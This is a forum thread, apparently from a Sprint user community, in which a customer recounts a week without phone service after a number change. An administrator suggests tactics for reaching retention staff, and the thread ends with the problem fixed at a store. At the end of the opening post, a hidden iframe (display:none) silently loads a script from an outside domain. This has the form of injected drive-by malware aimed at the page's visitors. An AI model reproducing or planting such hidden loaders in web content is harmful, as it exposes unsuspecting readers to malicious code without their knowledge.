+ Reply to Thread

Exclamation Phone hasn't worked in 4 days!

Hi..

This is my first encounter with a technical problem.

I moved from one state to another. So I could be reached locally on my phone, I called Sprint to get a new number.(Oct
    The rep programmed a new number in my phone and told me to give it a couple of hours. Well it never worked and the phone gave me a recording telling me the account was not validated.

I called Sprint again that evening and another rep said it wasn't a good number and gave me a second number. I woke up the next day and my phone was still dead.

I called Sprint back and talked to Ross in tech support. He said the customer service reps shouldn't of gave me another number and that just made the problem worse.

Well I had a old Sanyo laying around and so I could have some kind of service, a rep said I could get a temporary number. Well that didn't work either. I have no idea whether it's the tower or the computer, but I'm getting the same error recording.

The retention dept has been generous and they've given me 1000 daytime, 4000 n&w which start at 8pm, but I need my service to use it. It's not like they screwed up my billing, but I'm starting to consider leaving Sprint after 4 year now.

Anyone else had any technical problems that took longer than a day or so?? This is the fourth day and they still have no idea on when my phone will be on.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

i take it your programming the phone yourself while you have them on another line?

then make sure you are putting the codes in correctly and verify they have the same number. we i had my number changed recently (just before the launch of their 3G) the CS told me one number but he typed in another into the system so my phone did not work for a day.

you have a good plan it seems and it would be a shame to lose all of the clout you may have with sprint to start over somewhere else, but you have to be happy...

i never have had an issue with sprint go past 2 days... and i too have been with sprint for over 4 years (5 i believe.. when they were sprint spectrum).

Hi..thanks for the response.

Yes..I even called back and spoke with another rep who went through the whole programming thing again. That was just a few hours ago. Of course they told me to give it another 24-72 hours. I can understand a day or so, but now I'm on my 5th day and no one can tell me anything except there is some glitch in the computer and my phone is frozen. One person did tell me it was a tower thing.
    I'm still trying to hold on. I really dislike starting over from scratch with another provider and who knows what kind of new issues I could have.
    I read in another post that seemed true with Sprint. If it's working, don't mess with it.

Thanks..amber

Administrator

Arrow

i doubt its a tower thang...

its most likely a system issue. definately call back tomorrow and when claire comes on the line, be sure and say "cancel service".. that shoudl get you to someone quick.

then after you explain the situation, be sure and tell them you have been without service for a week and you expect to be reimbursed for that. take it to a supervisor if need be... once they see you gave been a long term customer they should jump on things...

in reality it should not take any longer than a couple of hours to get activated...
    then once you do that, you may have to get your wireless web security key renabled again... just FYI...

Finally, my phone is working!! :)

Hi Marctronixx,

I just got back from a Sprint store a little while ago and I finally have service!! It's been a week and I called and told them I was just tired and wanted to cancel service. Well this is the first time a tech support rep suggested to me to go into a store and swap out phones. (I'm still not sure if it was the phone)

I did that and I have to give it to Angela & Brian. The store closed at 7pm, but they didn't get my phone working until 9pm. They were wonderful. Angela did just what I was suggesting to the tech guys, but no one would do it. She wiped my account out and started from scratch. They even called the retention dept and set up my plan that they gave me previously, plus paid for next months service.

You were right. it was a system problem.

Thanks for the suggestions. I really didn't want to start over with anyone else.

Thanks..amber

Administrator

Arrow

ahhh problemm solved and sprint has one long term customer still on board.. this should make charles levine happy!

im glad all is well.